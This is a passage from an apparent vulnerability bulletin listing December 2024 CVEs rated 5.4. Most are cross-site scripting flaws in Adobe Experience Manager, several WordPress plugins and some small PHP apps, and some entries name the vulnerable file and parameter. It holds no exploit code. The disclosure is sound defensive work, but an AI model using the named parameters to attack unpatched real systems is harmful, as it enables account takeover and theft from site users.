The Popup Maker - Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'post_title' parameter in all versions up to, and including, 1.20.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-12 | 5.4 | CVE-2024-10583 |
| n/a -- n/a |
The MStore API - Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the profile picture upload functionality in all versions up to, and including, 4.16.4 due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload HTML files with arbitrary web scripts that will execute whenever a user accesses the file. | 2024-12-13 | 5.4 | CVE-2024-12042 |
| code-projects -- admin_dashboard |
A vulnerability was found in code-projects Admin Dashboard 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /vendor_management.php. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory mentions contradicting product names. | 2024-12-09 | 5.4 | CVE-2024-12359 |
| mayurik -- advocate_office_management_system |
A vulnerability, which was classified as problematic, has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected by this issue is some unknown functionality of the file /control/client_data.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-12 | 5.4 | CVE-2024-12536 |
| n/a -- n/a |
The SVG Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2024-12-13 | 5.4 | CVE-2024-12574 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could allow an attacker to execute arbitrary code in the context of the victim's browser. This issue occurs when data from a user-controllable source is improperly sanitized before being used in the Document Object Model (DOM) of a web page, leading to the execution of malicious scripts. Exploitation of this issue requires user interaction, such as tricking a victim into clicking a link or navigating to a malicious website. | 2024-12-10 | 5.4 | CVE-2024-43712 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to access a manipulated URL or page with the malicious script. | 2024-12-10 | 5.4 | CVE-2024-43713 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a vulnerable page. | 2024-12-10 | 5.4 | CVE-2024-43714 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a compromised form. | 2024-12-10 | 5.4 | CVE-2024-43715 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43718 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to access the manipulated URL or input. | 2024-12-10 | 5.4 | CVE-2024-43719 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited to execute arbitrary code in the context of the victim's browser session. By manipulating the DOM environment in the victim's browser, an attacker can inject malicious scripts that are executed by the victim's browser. Exploitation of this issue requires user interaction, typically in the form of following a malicious link. | 2024-12-10 | 5.4 | CVE-2024-43720 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to access a manipulated link or input data into a vulnerable page. | 2024-12-10 | 5.4 | CVE-2024-43721 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to access the manipulated URL or input. | 2024-12-10 | 5.4 | CVE-2024-43722 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or page. | 2024-12-10 | 5.4 | CVE-2024-43723 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. Exploitation of this issue requires user interaction. | 2024-12-10 | 5.4 | CVE-2024-43724 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43725 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43726 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43727 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43728 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43730 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a compromised form. | 2024-12-10 | 5.4 | CVE-2024-43733 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43734 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-43735 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43736 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43737 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could allow an attacker to execute arbitrary code in the context of the victim's browser. This issue occurs when data from a malicious source is processed by a web application and subsequently written to the web page without proper sanitization, allowing for the execution of unintended script code or the alteration of the intended user interface. User interaction is required as the victim must visit a malicious page or view a maliciously crafted link. | 2024-12-10 | 5.4 | CVE-2024-43738 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43739 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43740 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43742 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43743 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43744 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2024-12-10 | 5.4 | CVE-2024-43745 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43746 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43747 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43748 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43749 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43750 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43751 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-43752 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could allow an attacker to execute arbitrary code in the context of the victim's browser. This issue occurs when data from a malicious source is processed by a web application's client-side scripts to update the DOM. Exploitation of this issue requires user interaction, such as convincing a victim to click on a malicious link. | 2024-12-10 | 5.4 | CVE-2024-43754 |
| n/a -- n/a |
IBM Carbon Design System (Carbon Charts 0.4.0 through 1.13.16) is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2024-12-10 | 5.4 | CVE-2024-47117 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52816 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52817 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52818 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to access a manipulated URL or page with the malicious script. | 2024-12-10 | 5.4 | CVE-2024-52822 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a compromised form. | 2024-12-10 | 5.4 | CVE-2024-52823 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52824 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52825 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52826 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52827 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52828 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52829 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52830 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52832 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52834 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52835 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52836 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to access the manipulated URL or input for the exploit to execute. | 2024-12-10 | 5.4 | CVE-2024-52837 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a compromised form. | 2024-12-10 | 5.4 | CVE-2024-52838 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a compromised form. | 2024-12-10 | 5.4 | CVE-2024-52839 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to access the manipulated URL or input the malicious data themselves. | 2024-12-10 | 5.4 | CVE-2024-52840 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52841 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52842 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52843 |
| n/a -- n/a |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. This type of attack requires user interaction, as the victim would need to visit a malicious link or input data into a compromised form. | 2024-12-10 | 5.4 | CVE-2024-52844 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52845 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52846 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52847 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52848 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52849 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52850 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52851 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52852 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52853 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52854 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52855 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52857 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52858 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52859 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by an attacker to execute arbitrary code in the context of the victim's browser session. By manipulating a DOM element through a crafted URL or user input, the attacker can inject malicious scripts that run when the page is rendered. User interaction is required for exploitation, as a victim must visit a malicious link or input data into a vulnerable web application. | 2024-12-10 | 5.4 | CVE-2024-52860 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52861 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52862 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52864 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52865 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52991 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52992 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-52993 |
| adobe -- experience_manager |
Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2024-12-10 | 5.4 | CVE-2024-53960 |
| n/a -- n/a |
